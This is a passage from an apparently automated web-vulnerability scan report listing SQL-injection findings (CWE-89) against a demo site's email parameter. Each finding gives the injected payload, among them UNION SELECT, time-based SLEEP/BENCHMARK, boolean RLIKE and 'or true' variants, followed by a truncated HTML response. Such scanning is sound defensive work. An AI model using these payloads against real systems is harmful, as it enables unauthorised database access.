src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #475\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\")) or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #476\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #477\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #478\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #479\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #480\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #481\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' GROUP BY 1,2,--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #482\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #483\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #484\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RLIKE (SELECT (CASE WHEN (4346=4347) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #485\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 31337--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #486\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #487\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #488Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut 